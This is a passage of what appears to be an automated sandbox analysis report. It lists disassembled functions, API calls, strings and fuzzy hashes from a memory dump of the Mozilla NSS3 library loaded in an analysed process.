PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CCB4F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CCB4F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CCB4FC8

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: afd35c0547247b98d695c9316bc171292b5a3e408e527db83791a64dd2b06074
Instruction ID: 7ba2471db23c6811270290e42e8f5800ac1031319909b1a213703c9b82650f7d
Opcode Fuzzy Hash: afd35c0547247b98d695c9316bc171292b5a3e408e527db83791a64dd2b06074
Instruction Fuzzy Hash: 97819171A08301AFE701CFA9D880B5BB7E8AF84358F148529F958EB751F771E905CB92

Function 6CCE8F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6CCE9582), ref: 6CCE8F5B

Part of subcall function 6CCFBE30: SECOID_FindOID_Util.NSS3(6CCB311B,00000000,?,6CCB311B,?), ref: 6CCFBE44

PORT_NewArena_Util.NSS3(00000800), ref: 6CCE8F6A

Part of subcall function 6CD00FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CCA87ED,00000800,6CC9EF74,00000000), ref: 6CD01000
Part of subcall function 6CD00FF0: PR_NewLock.NSS3(?,00000800,6CC9EF74,00000000), ref: 6CD01016
Part of subcall function 6CD00FF0: PL_InitArenaPool.NSS3(00000000,security,6CCA87ED,00000008,?,00000800,6CC9EF74,00000000), ref: 6CD0102B

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CCE8FC3
PK11_GetIVLength.NSS3(-00000001), ref: 6CCE8FE0
SEC_ASN1DecodeItem_Util.NSS3(?,?,6CDCD820,6CCE9576), ref: 6CCE8FF9
DER_GetInteger_Util.NSS3(?), ref: 6CCE901D
PORT_ZAlloc_Util.NSS3(?), ref: 6CCE903E
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CCE9062
memcpy.VCRUNTIME140(00000024,?,?), ref: 6CCE90A2
PORT_ZAlloc_Util.NSS3(?), ref: 6CCE90CA
memcpy.VCRUNTIME140(00000018,?,?), ref: 6CCE90F0
PR_SetError.NSS3(FFFFE006,00000000), ref: 6CCE912D
free.MOZGLUE(00000000), ref: 6CCE9136
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CCE9145

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
String ID:
API String ID: 3626836424-0
Opcode ID: 156ed0892dee78629d5bcff75824e7d82f4f00ec651ee7be628687ddcd724e4a
Instruction ID: 28baa435a5237b4726395fd4fa4125762cdb6943d7c6e606ab474b65fe05c372
Opcode Fuzzy Hash: 156ed0892dee78629d5bcff75824e7d82f4f00ec651ee7be628687ddcd724e4a
Instruction Fuzzy Hash: 4651F2B2A042409BE700CF29DC81B9BB7E8AF89358F054529E955C7751F731E949CBE3

Function 6CC9AF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6CC9AF47

Part of subcall function 6CD69090: TlsGetValue.KERNEL32 ref: 6CD690AB
Part of subcall function 6CD69090: TlsGetValue.KERNEL32 ref: 6CD690C9
Part of subcall function 6CD69090: EnterCriticalSection.KERNEL32 ref: 6CD690E5
Part of subcall function 6CD69090: TlsGetValue.KERNEL32 ref: 6CD69116
Part of subcall function 6CD69090: LeaveCriticalSection.KERNEL32 ref: 6CD6913F

FreeLibrary.KERNEL32(?), ref: 6CC9AF6D
free.MOZGLUE(?), ref: 6CC9AFA4
free.MOZGLUE(?), ref: 6CC9AFAA
PR_ExitMonitor.NSS3 ref: 6CC9AFB5
PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6CC9AFF5
PR_ExitMonitor.NSS3 ref: 6CC9B005
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CC9B014
PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6CC9B028
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CC9B03C

Strings

Unloaded library %s, xrefs: 6CC9B023
%s decr => %d, xrefs: 6CC9AFF0

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
String ID: %s decr => %d$Unloaded library %s
API String ID: 4015679603-2877805755
Opcode ID: 0ce31ff867641ab50eb320344fd8962f5f1c94fc7b2db40130fa8d7ffcdd4024
Instruction ID: bb355e726dcf6d5ce748c13c754549575ff694ab0efe2d388c003e5af3c540ee
Opcode Fuzzy Hash: 0ce31ff867641ab50eb320344fd8962f5f1c94fc7b2db40130fa8d7ffcdd4024
Instruction Fuzzy Hash: DD31B1B5F04111ABEB119F65EC40A56B7B5EB8574CF184169E80A96E10F732E828C7F1

Function 6CCE6C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CCE781D,00000000,6CCDBE2C,?,6CCE6B1D,?,?,?,?,00000000,00000000,6CCE781D), ref: 6CCE6C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CCE781D,?,6CCDBE2C,?), ref: 6CCE6C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CCE781D), ref: 6CCE6C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CCE6C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CCE6C96

Part of subcall function 6CC91240: TlsGetValue.KERNEL32(00000040,?,6CC9116C,NSPR_LOG_MODULES), ref: 6CC91267
Part of subcall function 6CC91240: EnterCriticalSection.KERNEL32(?,?,?,6CC9116C,NSPR_LOG_MODULES), ref: 6CC9127C
Part of subcall function 6CC91240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CC9116C,NSPR_LOG_MODULES), ref: 6CC91291
Part of subcall function 6CC91240: PR_Unlock.NSS3(?,?,?,?,6CC9116C,NSPR_LOG_MODULES), ref: 6CC912A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CCE6CAA

Strings

NSS_DEFAULT_DB_TYPE, xrefs: 6CCE6C91
rdb:, xrefs: 6CCE6C69
dbm:, xrefs: 6CCE6C3A
extern:, xrefs: 6CCE6C7E
dbm, xrefs: 6CCE6CA4
sql:, xrefs: 6CCE6C52

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: 6c22b7e740d77fd1f7684b89ffaca09d8444c55ebe2c9051ae86cda7b07b0379
Instruction ID: 3b44813729ddf7c0071db3277606729e5e3e261cbb4619727546bbe6bde81663
Opcode Fuzzy Hash: 6c22b7e740d77fd1f7684b89ffaca09d8444c55ebe2c9051ae86cda7b07b0379
Instruction Fuzzy Hash: 0301F2E1B1270133F650377A6C4AFA2220CAF8A14CF150831FF18E0982FBA2E52881A5

Function 6CCF4E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6CCB78F8), ref: 6CCF4E6D

Part of subcall function 6CC909E0: TlsGetValue.KERNEL32(00000000,?,?,?,6CC906A2,00000000,?), ref: 6CC909F8
Part of subcall function 6CC909E0: malloc.MOZGLUE(0000001F), ref: 6CC90A18
Part of subcall function 6CC909E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6CC90A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6CCB78F8), ref: 6CCF4ED9

Part of subcall function 6CCE5920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6CCE7703,?,00000000,00000000), ref: 6CCE5942
Part of subcall function 6CCE5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6CCE7703), ref: 6CCE5954
Part of subcall function 6CCE5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CCE596A
Part of subcall function 6CCE5920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CCE5984
Part of subcall function 6CCE5920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6CCE5999
Part of subcall function 6CCE5920: free.MOZGLUE(00000000), ref: 6CCE59BA
Part of subcall function 6CCE5920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6CCE59D3
Part of subcall function 6CCE5920: free.MOZGLUE(00000000), ref: 6CCE59F5
Part of subcall function 6CCE5920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6CCE5A0A
Part of subcall function 6CCE5920: free.MOZGLUE(00000000), ref: 6CCE5A2E
Part of subcall function 6CCE5920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6CCE5A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6CCB78F8), ref: 6CCF4EB3

Part of subcall function 6CCF4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CCF4EB8,?,?,?,?,?,?,?,?,?,?,6CCB78F8), ref: 6CCF484C
Part of subcall function 6CCF4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CCF4EB8,?,?,?,?,?,?,?,?,?,?,6CCB78F8), ref: 6CCF486D
Part of subcall function 6CCF4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6CCF4EB8,?), ref: 6CCF4884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CCB78F8), ref: 6CCF4EC0

Part of subcall function 6CCF4470: TlsGetValue.KERNEL32(00000000,?,6CCB7296,00000000), ref: 6CCF4487
Part of subcall function 6CCF4470: EnterCriticalSection.KERNEL32(?,?,?,6CCB7296,00000000), ref: 6CCF44A0
Part of subcall function 6CCF4470: PR_Unlock.NSS3(?,?,?,?,6CCB7296,00000000), ref: 6CCF44BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6CCB78F8), ref: 6CCF4F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CCB78F8), ref: 6CCF4F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CCB78F8), ref: 6CCF4F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CCB78F8), ref: 6CCF4F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6CCB78F8), ref: 6CCF4F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CCB78F8), ref: 6CCF4F8F
PK11_UpdateSlotAttribute.NSS3(?,6CDCDCB0,00000000), ref: 6CCF4FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6CCF501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6CCB78F8), ref: 6CCF506B

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: a0974bdaa3a0278615e96994b7b9e4b6675aceeb8927561b68cfa68210ae55a8
Instruction ID: dceef1c411e0a443df6dca8cb6d2d116d286fc980b5ade316e39ffd2da4d651d
Opcode Fuzzy Hash: a0974bdaa3a0278615e96994b7b9e4b6675aceeb8927561b68cfa68210ae55a8
Instruction Fuzzy Hash: A651E3B5A002059BEB119F24EC01AAB76B4FF0531CF144539E92A86A52F732D52BCBD2

Function 6CC9ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC9ACE2
malloc.MOZGLUE(00000001), ref: 6CC9ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CC9AD02
TlsGetValue.KERNEL32 ref: 6CC9AD3C
calloc.MOZGLUE(00000001,?), ref: 6CC9AD8C
PR_Unlock.NSS3 ref: 6CC9ADC0
free.MOZGLUE(00000000), ref: 6CC9AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6CC9AE58
free.MOZGLUE(00000000), ref: 6CC9AE69
free.MOZGLUE(?), ref: 6CC9AE78
PR_Unlock.NSS3 ref: 6CC9AE8C
free.MOZGLUE(?), ref: 6CC9AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC9AEC7

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: 656ec01bee474973007fffb9342cc0cb666784b316f83fb96d521d5f43e15971
Instruction ID: d0d829fa059902c44414567eaa59ebee42a76f898e1c25822975ba2c1cc24c45
Opcode Fuzzy Hash: 656ec01bee474973007fffb9342cc0cb666784b316f83fb96d521d5f43e15971
Instruction Fuzzy Hash: 8F51C4B1F002158BEF10DF99EC4166E77B8BB8634CF144069D915A7B20E731E925CBE2

Function 6CCDADC0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6CCDADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CCDAE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CCDAE29

Part of subcall function 6CDBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CDBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CCDAE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CCDAE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CCDAE8A
PR_LogPrint.NSS3(?,00000000), ref: 6CCDAEA0

Strings

C_MessageSignInit, xrefs: 6CCDADE1
hSession = 0x%x, xrefs: 6CCDAE01, 6CCDAE11
hKey = 0x%x, xrefs: 6CCDAE62, 6CCDAE72
(CK_INVALID_HANDLE), xrefs: 6CCDAE1F, 6CCDAE80

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
API String ID: 332880674-605059067
Opcode ID: e162d754723ab911f92112e1f826de1d02319fd6593979335e78f805a8a2d517
Instruction ID: b2073ca0ff265c633d64c46a26a984cdaac0e29c8f09b5a3c80ab02693c676f2
Opcode Fuzzy Hash: e162d754723ab911f92112e1f826de1d02319fd6593979335e78f805a8a2d517
Instruction Fuzzy Hash: 64311A72700105AFDB00DF14DC88FAA37B5AB8631DF454469E5096BB61EB31E928CBE2

Function 6CD74C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6CD74CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CD74CFD
sqlite3_value_text16.NSS3(?), ref: 6CD74D44

Strings

abort due to ROLLBACK, xrefs: 6CD74D27, 6CD74D33
unknown error, xrefs: 6CD74D56
out of memory, xrefs: 6CD74C78, 6CD74C9E
another row available, xrefs: 6CD74D20
invalid, xrefs: 6CD74CF1
bad parameter or other API misuse, xrefs: 6CD74D05
API call with %s database connection pointer, xrefs: 6CD74CF6
no more rows available, xrefs: 6CD74D2E

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: c3651e1abb1c2152427973cb07a5f67f278384f863cfd074e20ce76079259c8e
Instruction ID: adfcf0dd3e72e645256119a2265b0fad63995110cf9ef9ef46a576d1689c09c3
Opcode Fuzzy Hash: c3651e1abb1c2152427973cb07a5f67f278384f863cfd074e20ce76079259c8e
Instruction Fuzzy Hash: 2C3177B3E04811E7E7270724A9117E4B3267B82318F150129D4A44BF34DB71EC218FF2

Function 6CCD2DD0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6CCD2DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CCD2E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CCD2E33

Part of subcall function 6CDBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CDBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CCD2E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CCD2E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CCD2E81

Strings

hSession = 0x%x, xrefs: 6CCD2E0E, 6CCD2E1E
ulPinLen = %d, xrefs: 6CCD2E7C
pPin = 0x%p, xrefs: 6CCD2E63
C_InitPIN, xrefs: 6CCD2DF1
(CK_INVALID_HANDLE), xrefs: 6CCD2E2C

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
API String ID: 1003633598-1777813432
Opcode ID: 7c5409da747711c378256cdb937278df7687548af7a4cfee1da53dbd09ac20f6
Instruction ID: ddbff2d8be98a93e6de71d76bd3c2b54938f0bc27bfd669193fa0416e8bdaf3c
Opcode Fuzzy Hash: 7c5409da747711c378256cdb937278df7687548af7a4cfee1da53dbd09ac20f6
Instruction Fuzzy Hash: 653107B1701155AFEB00DF15DD4CB4A3BB5EB4631AF094028E909A7B61EB31ED18CBE2

Function 6CCD6EF0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6CCD6F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CCD6F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CCD6F53

Part of subcall function 6CDBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CDBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CCD6F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6CCD6F88
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6CCD6FA1

Strings

hSession = 0x%x, xrefs: 6CCD6F2E, 6CCD6F3E
ulPartLen = %d, xrefs: 6CCD6F9C
pPart = 0x%p, xrefs: 6CCD6F83
(CK_INVALID_HANDLE), xrefs: 6CCD6F4C
C_DigestUpdate, xrefs: 6CCD6F11

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate
API String ID: 1003633598-226530419
Opcode ID: ae41448a999b8e9de2d722886838b6c4a1d349d4cdfc4fc754e6e145fcd7b26e
Instruction ID: cb3e35902854cd2467d1526c70d75d54fda5cf03ada3b78838d1a893eb93223b
Opcode Fuzzy Hash: ae41448a999b8e9de2d722886838b6c4a1d349d4cdfc4fc754e6e145fcd7b26e
Instruction Fuzzy Hash: 21312871701554AFEB00DF64DD48F4A37B5EB42319F094429E909A7A62EB31F91CCBE2

Function 6CD72D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6CD72D9F

Part of subcall function 6CC2CA30: EnterCriticalSection.KERNEL32(?,?,?,6CC8F9C9,?,6CC8F4DA,6CC8F9C9,?,?,6CC5369A), ref: 6CC2CA7A
Part of subcall function 6CC2CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CC2CB26

sqlite3_exec.NSS3(?,?,6CD72F70,?,?), ref: 6CD72DF9
sqlite3_free.NSS3(00000000), ref: 6CD72E2C
sqlite3_free.NSS3(?), ref: 6CD72E3A
sqlite3_free.NSS3(?), ref: 6CD72E52
sqlite3_mprintf.NSS3(6CDDAAF9,?), ref: 6CD72E62
sqlite3_free.NSS3(?), ref: 6CD72E70
sqlite3_free.NSS3(?), ref: 6CD72E89
sqlite3_free.NSS3(?), ref: 6CD72EBB
sqlite3_free.NSS3(?), ref: 6CD72ECB
sqlite3_free.NSS3(00000000), ref: 6CD72F3E
sqlite3_free.NSS3(?), ref: 6CD72F4C

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

